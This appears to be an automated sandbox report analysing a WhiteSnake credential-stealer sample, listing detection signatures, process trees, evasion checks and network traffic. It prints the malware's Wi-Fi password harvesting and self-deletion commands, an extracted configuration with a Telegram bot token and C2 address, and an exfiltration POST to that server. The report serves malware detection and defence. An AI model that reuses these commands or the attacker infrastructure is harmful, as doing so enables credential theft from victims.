Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1550690
MD5: c426f46f2c074eda8c903f9868be046d
SHA1: d0352482370beff107eb2b2f13e2de275fbc91c7
SHA256: 7cba781d569196e89a86f10cee7d69918fe05df1461d1f0ed3426ccb2046002e
Tags: exe, user-Bitsight

Detection

WhiteSnake Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected WhiteSnake Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Self deletion via cmd or bat file
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C426F46F2C074EDA8C903F9868BE046D)
    • cmd.exe (PID: 7436 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7640 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7684 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7692 cmdline: findstr /R /C:"[ ]:[ ]" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7736 cmdline: "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7780 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • netsh.exe (PID: 7796 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 7812 cmdline: findstr "SSID BSSID Signal" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7972 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8020 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • timeout.exe (PID: 8036 cmdline: timeout /t 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
Malware configuration (WhiteSnake): {"Version": "1.6.3.5", "Telegram Token": "7720988404:AAHJ1d0so4FzXOrfQavDsW60uUFev7BQSjU", "Telegram chatid": "1660795749", "C2 urls": ["http://147.124.221.201:8080"]}

Source | Rule | Description | Author | Strings
Process Memory Space: file.exe PID: 7260 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 7260 | JoeSecurity_WhiteSnake | Yara detected WhiteSnake Stealer | Joe Security |

      System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7260, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7436, ProcessName: cmd.exe
Source: Network Connection | Author: Florian Roth (Nextron Systems) | Data: DestinationIp: 147.124.221.201, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\file.exe, Initiated: true, ProcessId: 7260, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731

      Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7260, ParentProcessName: file.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 7436, ProcessName: cmd.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T03:07:01.191138+0100 | 2050602 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 147.124.221.201 | 8080 | TCP
2024-11-07T03:07:01.140283+0100 | 2050601 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 147.124.221.201 | 8080 | TCP

      AV Detection

Source: file.exe | Avira: detected
Source: 00000000.00000002.1710856387.000001D7A7311000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: WhiteSnake {"Version": "1.6.3.5", "Telegram Token": "7720988404:AAHJ1d0so4FzXOrfQavDsW60uUFev7BQSjU", "Telegram chatid": "1660795749", "C2 urls": ["http://147.124.221.201:8080"]}
Source: http://185.217.98.121:80 | Virustotal: Detection: 12%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A7A21 CryptUnprotectData, 0_2_00007FFD9B8A7A21
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A7B6D CryptUnprotectData, 0_2_00007FFD9B8A7B6D
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Networking

Source: Network traffic | Suricata IDS: 2050601 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request : 192.168.2.4:49731 -> 147.124.221.201:8080
Source: Network traffic | Suricata IDS: 2050602 - Severity 1 - ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration : 192.168.2.4:49731 -> 147.124.221.201:8080
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 147.124.221.201:8080
Source: global traffic | HTTP traffic detected: GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1 Host: 147.124.221.201:8080 Content-Length: 134077 Expect: 100-continue Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: AC-AS-1US
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 147.124.221.201
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: unknown | HTTP traffic detected: POST /sendData?pk=QzU5OUI3MkVDOEQxQjhFMTM4MUIyQTcyNTlBOUQ4N0Q=&ta=RGVmYXVsdA==&un=am9uZXM=&pc=OTgwMTA4&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA== HTTP/1.1 Host: 147.124.221.201:8080 Content-Length: 134077 Expect: 100-continue Connection: Keep-Alive

      System Summary

Source: file.exe, oNAMlo.cs | Long String: Length: 11394
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8AB115 NtQueryInformationToken, 0_2_00007FFD9B8AB115
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A9D2B NtQueryInformationToken, 0_2_00007FFD9B8A9D2B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A9D22 NtClose, 0_2_00007FFD9B8A9D22
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8AE3F9 NtClose, 0_2_00007FFD9B8AE3F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8AB305 NtQueryInformationToken, 0_2_00007FFD9B8AB305
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A304C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A7285
Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Load Driver
Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Security
Source: file.exe, 00000000.00000002.1723816368.000001D7BFF6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000000.1668471112.000001D7A5712000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameq1b1f46dc103cd7a4b836032461987dde3b.exeh$ vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameq1b1f46dc103cd7a4b836032461987dde3b.exeh$ vs file.exe
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@26/3@1/2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A9C62 AdjustTokenPrivileges, 0_2_00007FFD9B8A9C62
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8AED85 AdjustTokenPrivileges, 0_2_00007FFD9B8AED85
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\o08k2d5ob5
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\11ll02lod7
Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000002.1710856387.000001D7A7387000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout /t 3
      Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: rasapi32.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: rasman.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: rtutils.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll
      Source: C:\Windows\System32\chcp.com | Section loaded: fsutilext.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rasmontr.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mfc42u.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: authfwcfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: fwpolicyiomgr.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: firewallapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: fwbase.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcmonitor.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: dot3cfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: dot3api.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: onex.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: eappcfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: eappprxy.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: ntasn1.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: fwcfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: hnetmon.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: netshell.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nlaapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: netsetupapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: netiohlp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nettrace.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nshhttp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: httpapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nshipsec.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: activeds.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: polstore.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: winipsec.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: adsldpc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: nshwfp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: cabinet.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: p2pnetsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: p2p.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rpcnsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wcnnetsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wlanapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: whhelper.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wlancfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wshelper.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wevtapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mswsock.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wwancfg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wwapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wcmapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: rmclient.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mobilenetworking.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: peerdistsh.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: ktmw32.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: mprmsg.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\netsh.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\timeout.exe | Section loaded: version.dll
      Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
      Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: file.exe | Static PE information: 0xE480C158 [Mon Jun 25 20:55:52 2091 UTC]
      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A4BD3 pushad ; retf 0_2_00007FFD9B8A4BD9
      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FFD9B8A477E push ds; iretd 0_2_00007FFD9B8A477F

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\Desktop\file.exe | Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\Desktop\file.exe"
      Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
      Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\file.exe | Memory allocated: 1D7A5A70000 memory reserve | memory write watch
      Source: C:\Users\user\Desktop\file.exe | Memory allocated: 1D7BF310000 memory reserve | memory write watch
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 600000
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599875
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599766
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599656
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599547
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599438
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599313
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599188
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599063
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598946
      Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598839
      Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1903
      Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1616
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -6456360425798339s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -600000s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599875s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599766s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599656s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599547s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599438s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599313s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599188s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -599063s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -598946s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7952 | Thread sleep time: -598839s >= -30000s
      Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: file.exe | Binary or memory string: qemu'<
      Source: file.exe, 00000000.00000002.1722752489.000001D7BFCAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\file.exe | Process token adjusted: Debug
      Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: file.exe, l_.cs | Reference to suspicious API methods: NativeMethods.OpenProcess(processAccessMask, bInheritHandle: false, process.Id)
      Source: file.exe, sNgu.cs | Reference to suspicious API methods: GetProcAddress(tpov7V, b5u)
      Source: file.exe, w70oes.cs | Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)
